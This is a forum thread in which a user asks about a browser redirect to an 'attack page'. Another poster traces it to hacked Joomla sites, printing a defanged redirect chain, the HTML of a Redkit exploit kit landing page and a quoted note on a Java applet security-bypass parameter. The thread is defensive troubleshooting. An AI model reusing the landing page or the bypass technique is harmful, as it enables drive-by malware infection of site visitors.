We’d like to remind Forumites to please avoid political debate on the Forum.

This is to keep it a safe and useful space for MoneySaving discussions. Threads that are – or become – political in nature may be removed in line with the Forum’s rules. Thank you for your understanding.

📨 Have you signed up to the Forum's new Email Digest yet? Get a selection of trending threads sent straight to your inbox daily, weekly or monthly!

Macbook web page redirecting

I have a problem when i click on certain webpages it automatically comes up with "attack page" redirect to https://www.atv-haltern-volleyball.de.
I assume this is some type of spyware or something?? I am not technically minded so don't really know.
Any idea how i can get rid of this ?
Many thanks
«1

Comments

  • Hey Netballdi,

    As you're with a Mac, there aren't many free options for removing spyware on your computer. What anti-virus software do you have (if any), and what is your budget for potentially getting a new one?

    I agree that it is spyware, and there are boards on the internet that specialize in self-remedying these type of issues, or you can bring it to a trusted computer store. You can also try your hand at contacting Apple Support who may have more specific instructions than I do.
  • waddler_8
    waddler_8 Posts: 3,588 Forumite
    I agree that it is spyware
    My initial research suggests the problem is web based with a number of Joomla powered websites being infected & redirecting to the the aforementioned site.

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=westcountrycookers.com

    http://www.google.com/safebrowsing/diagnostic?site=http://www.atv-haltern-volleyball.de/&hl=en
  • waddler_8
    waddler_8 Posts: 3,588 Forumite
    Serves up a Java exploit via the Redkit exploit kit.
    GET hxxp://westcountrycookers.com/
    302 Moved Temporarily to hxxp://www.atv-haltern-volleyball.de/includes/domit/xml_domit_lites_parser.php
    
    GET hxxp://www.atv-haltern-volleyball.de/includes/domit/xml_domit_lites_parser.php
    302 Found to hxxp://www.shifajeddah.com/includes/PEAR/include/www/all.php
    
    GET hxxp://www.shifajeddah.com/includes/PEAR/include/www/all.php
    302 Found to hxxp://peicentre-ng.com/cache/1.php
    
    GET hxxp://peicentre-ng.com/cache/1.php
    302 Moved Temporarily to hxxp://screex.de/wgdb.html
    
    GET hxxp://screex.de/wgdb.html
    200 OK (text/html)
    
    CONNECT hxxp://urs.microsoft.com:443
    200 Connection Established ()
    
    GET hxxp://screex.de/favicon.ico
    404 Not Found (text/html)
    

    Source code of hxxp://screex.de/wgdb.html
    <html><body><title>Mannaro</title><applet name="Cahsarkr">Your browser doesnot support this<param name="jnlp_href" value="rg.jnlp">opp</param><param name="name" value="/vvi299.6&ooms5o91?s/vfh"></param></applet></body></html>
    

    http://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/
    The JNLP file referenced in the landing page (above) reveals a security bypass that is being used by several of the active exploit kits. The attacks make use of an undocumented parameter (__applet_ssv_validated) to bypass security restrictions, and enable silent (no user prompt) execution of an unsigned applet.
  • netballdi
    netballdi Posts: 69 Forumite
    Part of the Furniture 10 Posts Combo Breaker
    Thanks for the reply, but being not very technical, I haven't a clue what you have said !!!!
    I will try ringing Apple support today I think.
  • waddler_8
    waddler_8 Posts: 3,588 Forumite
    As it's only happens "on certain webpages" I'm sure the fault lies with the website's you are visiting rather than your computer - They've been hacked.

    Scan it with an antivirus to see if anything is detected - http://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx
  • netballdi
    netballdi Posts: 69 Forumite
    Part of the Furniture 10 Posts Combo Breaker
    Many thanks, i will try that !
  • waddler_8
    waddler_8 Posts: 3,588 Forumite
    If you give one example of a website you get the warning from I can check it out.

    DO NOT post a live link - Just put website dot com
  • netballdi
    netballdi Posts: 69 Forumite
    Part of the Furniture 10 Posts Combo Breaker
    I get it from an estate agents, pageandwells.com
  • waddler_8
    waddler_8 Posts: 3,588 Forumite
    Yes, it's the actual website that has been compromised.

    I got the same redirection as above.
  • netballdi
    netballdi Posts: 69 Forumite
    Part of the Furniture 10 Posts Combo Breaker
    So it's their problem rather than mine ??
This discussion has been closed.
Meet your Ambassadors

🚀 Getting Started

Hi new member!

Our Getting Started Guide will help you get the most out of the Forum

Categories

  • All Categories
  • 351.7K Banking & Borrowing
  • 253.4K Reduce Debt & Boost Income
  • 454K Spending & Discounts
  • 244.7K Work, Benefits & Business
  • 600.1K Mortgages, Homes & Bills
  • 177.3K Life & Family
  • 258.4K Travel & Transport
  • 1.5M Hobbies & Leisure
  • 16.2K Discuss & Feedback
  • 37.6K Read-Only Boards

Is this how you want to be seen?

We see you are using a default avatar. It takes only a few seconds to pick a picture.